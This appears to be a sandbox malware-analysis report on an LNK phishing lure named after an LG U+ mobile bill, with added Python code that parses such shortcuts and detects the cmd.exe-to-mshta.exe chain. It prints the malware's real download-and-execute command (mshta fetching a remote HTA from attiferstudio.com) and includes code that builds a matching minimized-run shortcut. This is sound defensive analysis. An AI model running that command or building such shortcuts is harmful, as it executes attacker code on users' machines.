Overview
Task tabs (score, sample, platform):
- 10 Static
- 8 LG유플....html on windows7-x64
- 1 LG유플....html on windows10-2004-x64
- 1 LG유플...ml.lnk on windows7-x64
- 10 LG유플...ml.lnk on windows10-2004-x64
- 10 MAIL_20230...02.chm on windows7-x64
- 10 MAIL_20230...02.chm on windows10-2004-x64
- 10 Message.chm on windows7-x64
- 10 Message.chm on windows10-2004-x64
- 10 Message.chm on windows7-x64
- 10 Message.chm on windows10-2004-x64
Analysis (score 10)
- max time kernel: 145s
- max time network: 136s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-03-2023 23:32
Behavioral tasks (sample, resource):
- behavioral1: LG유플러스_이동통신_202208_이_선.html, win7-20230220-en
- behavioral2: LG유플러스_이동통신_202208_이_선.html, win10v2004-20230220-en
- behavioral3: LG유플러스_이동통신_202208_이_선.html.lnk, win7-20230220-en
- behavioral4: LG유플러스_이동통신_202208_이_선.html.lnk, win10v2004-20230220-en
- behavioral5: MAIL_20230125151802.chm, win7-20230220-en
- behavioral6: MAIL_20230125151802.chm, win10v2004-20230221-en
- behavioral7: Message.chm, win7-20230220-en
- behavioral8: Message.chm, win10v2004-20230220-en
- behavioral9: Message.chm, win7-20230220-en
- behavioral10: Message.chm, win10v2004-20230220-en
General
- Target: LG유플러스_이동통신_202208_이_선.html.lnk
- Size: 1KB
- MD5: eb7a6e3dc8bbc26f208c511ec7ee1d4c
- SHA1: b259d84f43f10a00edf1eca1c48610490e0aeb4c
- SHA256: 7c248e03cf87ea3d9a207b17925b7fd8998e9a0b462e601d178ff4c1cd9a1708
- SHA512: b583bf4cd0b31b9961a268cacd1d05c104886487960c03924c3ba07c33aa56743ed9c3d30bc0191c501db5214360612ae0c8721690001fc8a459c06609dc7227
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/3.html
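The extracted URL is the argument string baked into the 1KB shortcut: the .lnk targets cmd.exe and passes it "/c start mshta <URL>", so the configuration can be read statically from the LNK's StringData fields without detonating anything. The parser below is an added example for this report (not code from the sandbox vendor or the malware author). It follows the MS-SHLLINK layout (header, optional LinkTargetIDList and LinkInfo, then Name/RelativePath/WorkingDir/Arguments/IconLocation). The sample bytes are constructed to reproduce the command line seen in the process tree; the real shortcut's internal fields (relative path, flags, ShowCommand) are not on the page and are assumed here.

```python
"""Minimal MS-SHLLINK parser: recover target and arguments from a .lnk lure.

Added example for this report, not sandbox-vendor code. SAMPLE is a
CONSTRUCTED shortcut that mimics the observed "cmd.exe /c start mshta <URL>";
the real sample's internal fields are not on the page.
"""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this order
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
SW_SHOWMINNOACTIVE = 7  # "run minimized": common in LNK lures (assumed here)


def _string_data(s):
    # CountCharacters (uint16) followed by UTF-16LE characters, no terminator
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments, show_command=1):
    """Build a minimal ShellLink carrying only RelativePath and Arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID.bytes_le
    # LinkFlags, FileAttributes, Creation/Access/Write time, FileSize,
    # IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header += struct.pack("<IIQQQIIIHHII", flags, 0x80, 0, 0, 0, 0, 0,
                          show_command, 0, 0, 0, 0)
    assert len(header) == HEADER_SIZE
    return header + _string_data(relative_path) + _string_data(arguments)


def parse_lnk(data):
    """Return the header ShowCommand plus every StringData field present."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink: bad HeaderSize")
    if data[4:20] != LNK_CLSID.bytes_le:
        raise ValueError("not a ShellLink: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        fields[key] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


LOLBINS = ("cmd", "powershell", "mshta", "wscript", "cscript", "rundll32",
           "regsvr32", "certutil", "bitsadmin")


def triage(fields):
    """Flag the shortcut traits that match this report's process tree."""
    cmdline = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    findings = []
    for name in LOLBINS:
        if re.search(r"(^|[\\\s\"])%s(\.exe)?\b" % name, cmdline, re.I):
            findings.append("launches " + name)
    for url in re.findall(r"https?://[^\s\"']+", cmdline):
        findings.append("embedded URL: " + url)
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("runs minimized (SW_SHOWMINNOACTIVE)")
    return findings


# Constructed stand-in for the submitted .lnk; real bytes are not on the page
SAMPLE = build_lnk(
    "..\\..\\..\\..\\Windows\\System32\\cmd.exe",
    "/c start mshta http://attiferstudio.com/install.bak/sony/3.html",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE)
    print(parsed)
    for line in triage(parsed):
        print("  !", line)
```

Run it against a real shortcut with `parse_lnk(open(path, "rb").read())`; the LinkTargetIDList and LinkInfo blocks are skipped by their size fields, which is enough to reach the arguments in most lures, but a shortcut that stores its target only in the IDList (no RelativePath) will show the arguments without the executable name.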
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 8, pid 4012, process mshta.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    cmd.exe: key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation
  Caveat: the read comes from cmd.exe, which touches this key as part of ordinary shell start-up, so on its own it is a weak indicator; a real geofence would be visible as the HTA or a later stage acting on the value, and no such behaviour is recorded here.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is the signature's generic description; no process IoC is attached, and nothing else in the report shows file encryption. The observed chain is a downloader (cmd.exe -> mshta.exe -> remote HTA).
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    PID 1232 (cmd.exe) wrote to memory of 3308 (cmd.exe)
    PID 1232 (cmd.exe) wrote to memory of 3308 (cmd.exe)
    PID 3308 (cmd.exe) wrote to memory of 4012 (mshta.exe)
    PID 3308 (cmd.exe) wrote to memory of 4012 (mshta.exe)
  These writes are each parent setting up the child it has just created, so they document the spawn chain rather than injection into an unrelated process.
Processes
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\LG유플러스_이동통신_202208_이_선.html.lnk
  (depth 1: Checks computer location settings; Suspicious use of WriteProcessMemory)
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start mshta http://attiferstudio.com/install.bak/sony/3.html
    (depth 2: Suspicious use of WriteProcessMemory)
    - C:\Windows\system32\mshta.exe
      mshta http://attiferstudio.com/install.bak/sony/3.html
      (depth 3: Blocklisted process makes network request)
The first cmd.exe is the sandbox opening the submitted shortcut. The second is the shortcut's own target: cmd.exe with "/c start mshta <URL>", which hands the remote HTA to mshta.exe, so the actual payload is whatever that URL served at detonation time and is not captured in this report.
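The tree above is the whole detection opportunity on the endpoint: a shortcut-launched cmd.exe spawning mshta.exe with an http URL as its only argument. The script below is an added example (not part of the report or the sandbox's own detection logic) that runs that logic over process-creation telemetry. The events are constructed Sysmon-style records shaped after the PIDs and command lines in the tree, plus a benign local-HTA launch that must not alert; parent PID 900 is a placeholder for an unknown launcher and is not from the page.

```python
"""Flag the cmd.exe -> mshta.exe <remote HTA> chain in process-creation telemetry.

Added example for this report, not sandbox-vendor code. EVENTS is a
CONSTRUCTED Sysmon-style list shaped after the PIDs and command lines in
the report; PID 900 is a placeholder parent, not from the page.
"""
import re

# (pid, parent_pid, image, command_line); constructed, not captured logs
EVENTS = [
    (1232, 900, r"C:\Windows\system32\cmd.exe",
     r"cmd /c C:\Users\Admin\AppData\Local\Temp\LG유플러스_이동통신_202208_이_선.html.lnk"),
    (3308, 1232, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c start mshta http://attiferstudio.com/install.bak/sony/3.html'),
    (4012, 3308, r"C:\Windows\system32\mshta.exe",
     r"mshta http://attiferstudio.com/install.bak/sony/3.html"),
    # benign local HTA with no .lnk ancestry: must not alert
    (5100, 900, r"C:\Windows\System32\mshta.exe",
     r'mshta "C:\Program Files\Vendor\help.hta"'),
]

# http(s)/ftp URLs or UNC paths handed to mshta mean remote code is loaded
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://\S+|\\\\[^\\\s]+\\\S+", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid, limit=32):
    """Walk parent links upward from pid; returns events child-first."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < limit:  # limit guards PID-reuse loops
        chain.append(by_pid[pid])
        pid = by_pid[pid][1]
    return chain


def detect(events):
    """One alert per mshta.exe that loads remote content or descends from a .lnk."""
    alerts = []
    for pid, _ppid, image, cmdline in events:
        if image_name(image) != "mshta.exe":
            continue
        chain = ancestry(events, pid)
        names = " <- ".join(image_name(e[2]) for e in chain)
        remote = REMOTE_RE.findall(cmdline)
        # did a cmd.exe ancestor get started on a shortcut file?
        from_lnk = any(image_name(e[2]) == "cmd.exe" and ".lnk" in e[3].lower()
                       for e in chain[1:])
        if remote:
            alerts.append({"pid": pid, "severity": "high",
                           "reason": "mshta.exe loading remote HTA " + remote[0],
                           "chain": names, "from_lnk": from_lnk})
        elif from_lnk:
            alerts.append({"pid": pid, "severity": "medium",
                           "reason": "mshta.exe descended from a .lnk via cmd.exe",
                           "chain": names, "from_lnk": True})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The remote-URL match is the high-confidence half and stands alone; the .lnk ancestry check is kept separate so a shortcut that drops a local HTA first still produces a (lower-severity) alert. Feeding real Sysmon Event ID 1 records only needs the tuple built from ProcessId, ParentProcessId, Image and CommandLine.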